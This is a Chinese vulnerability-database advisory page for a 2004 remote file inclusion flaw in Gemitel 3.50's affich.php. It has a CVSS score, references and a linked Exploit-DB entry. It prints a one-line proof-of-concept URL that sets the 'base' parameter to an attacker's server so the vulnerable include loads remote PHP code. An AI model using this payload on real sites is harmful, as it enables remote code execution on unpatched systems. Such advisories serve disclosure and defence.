发布时间 :2004-04-15 00:00:00
修订时间 :2016-10-17 23:03:17

[原文]PHP remote file inclusion vulnerability in affich.php in Gemitel 3.50 allows remote attackers to execute arbitrary PHP code via the base parameter.

[CNNVD]Gemitel Affich.PHP远程文件包含命令注入漏洞(CNNVD-200404-050)

        Gemitel 3.50版本中的affich.php存在PHP远程文件包含漏洞。远程攻击者可以通过base参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040415 Include vulnerability in GEMITEL v 3.50
(VENDOR_ADVISORY)  XF  gemitel-spturnphpfile-include(15887)

- 漏洞信息

Gemitel Affich.PHP远程文件包含命令注入漏洞
高危 访问验证错误
2004-04-15 00:00:00 2006-09-28 00:00:00
        Gemitel 3.50版本中的affich.php存在PHP远程文件包含漏洞。远程攻击者可以通过base参数执行任意PHP代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- 漏洞信息 (24009)

Gemitel 3.50 Affich.PHP Remote File Include Command Injection Vulnerability (EDBID:24009)
php webapps
2004-04-15 Verified
0 jaguar
N/A [点击下载]

A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.

It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.[Gemitel folder]/html/affich.php?base=http://[your server]/		

- 漏洞信息

Gemitel affich.php base Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

Gemitel contains a flaw that may allow a malicious user to execute arbitrary script code. The 'affich.php' file fails to verify the 'base' parameter before it is used to include a file. This flaw may lead to a loss of Confidentiality, Integrity and/or Availability.

- 时间线

2004-04-15 2004-04-16
2004-04-16 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者